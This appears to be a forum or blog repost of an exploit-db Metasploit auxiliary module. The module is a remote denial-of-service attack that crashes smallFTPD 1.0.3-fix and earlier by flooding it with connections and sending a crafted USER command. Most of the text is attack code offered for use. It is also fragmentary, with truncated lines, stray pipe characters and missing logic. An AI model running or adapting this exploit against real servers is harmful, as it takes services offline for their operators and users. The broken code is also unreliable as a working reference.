Exploit para dos no SmallFTPD:
# Exploit Title: smallFTPD Connection Saturation Remote Denial of Service
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> |
# Software Link: http://smallftpd.sf.net |
# Version: 1.0.3-fix and earlier |
# Tested on: windows xp, seven, 2k3 |
# This file is part of the Metasploit Framework and may be subject to |
# redistribution and commercial restrictions. Please see the Metasploit |
# Framework web site for more information on licensing and terms of use. |
# http://metasploit.com/framework/ |
class Metasploit3 < Msf::Auxiliary |
include Msf::Exploit::Remote::Tcp |
include Msf::Auxiliary::Dos |
def initialize(info = {}) |
'Name' => 'smallFTPD Connection Saturation Remote Denial of Service' , |
This module triggers unauthenticated Denial-of-Service condition in SmallFTPD server versions 1 . 0 . 3 -fix and earlier with a few dozens of connection requests. The vulnerability is probably conerned with smallftpd being unable to handle multiple connections regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or still seem functioning by showing its service banner. But in fact it stops denying new FTP requests, which can be verified only through a valid login. |
'Author' => [ 'Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>' ], |
'License' => MSF_LICENSE , |
'Version' => '$Revision: $' , |
[ 'URL' , 'http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos' ] |
'DisclosureDate' => 'June 2010' )) |
print_status( "Sending DOS Packets ..." ) |
sock.put( "USER CRASHEDrn" ) |
end
Fonte: http://www.exploit-db.com/exploits/17455/